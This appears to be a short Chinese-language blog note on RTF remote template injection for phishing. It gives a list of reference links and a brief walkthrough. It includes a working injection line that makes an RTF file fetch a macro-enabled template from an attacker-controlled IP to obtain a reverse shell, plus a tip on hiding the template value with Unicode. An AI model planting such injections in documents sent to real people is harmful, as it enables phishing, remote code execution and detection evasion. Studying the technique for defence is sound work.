跳至主要內容

RTF注入Office模板

2332024年6月13日大约 1 分钟

RTF注入Office模板

Office RTF远程模板注入 - Bl0od - 博客园 (cnblogs.com)

黑客越来越多地使用RTF模板注入技术进行网络钓鱼攻击 - 哈客部落 (hake.cc)

【钓鱼从入门到放弃】-RTF文档 (atsud0.me)

奇安信威胁情报中心 (qianxin.com)

Decodificando ficheros RTF maliciosos (ciberseguridad.blog)

Rich Text Format (RTF) Version 1.5 Specification (biblioscape.com)

RTF Template Injection: Phishing Attachment Techniques | Proofpoint US

RTF sample which belongs to APT-C-35 group (only 4 detections in VT)

富文本格式 (RTF) 1.5 版规范 --- Rich Text Format (RTF) Version 1.5 Specification (biblioscape.com)

RTF是富文本格式(Rich Text Format)又称多文本格式, 是由微软公司开发的跨平台文档格式

大多数的文字处理软件都能读取和保存RTF文档

RTF文档支持 template 参数, 可以指定目的模板路径来加载模板

image-20240611163233113

使用 Office Word 新建一个文档然后保存为 RTF 文档

image-20240611111848392

image-20240611112041230

使用文本编辑器打开此 RTF 文档

{\*\template http://100.1.1.131:8000/download/VBA_PowerShell.docm}

image-20240611141220417

image-20240611151608170

这样下载文件特别慢(

等待下载完执行即可达成反弹shell

image-20240611151622885

Office RTF远程模板注入 - Bl0od - 博客园 (cnblogs.com)

Rich Text Format (RTF) Version 1.5 Specification (biblioscape.com)

*\template 字段参数值可以为Unicode,可以更好隐藏自身

image-20240612102526403

image-20240612112445656

编辑此页
上次编辑于: 2024/6/28 09:10:16
贡献者: 233
Copyright © 2025 233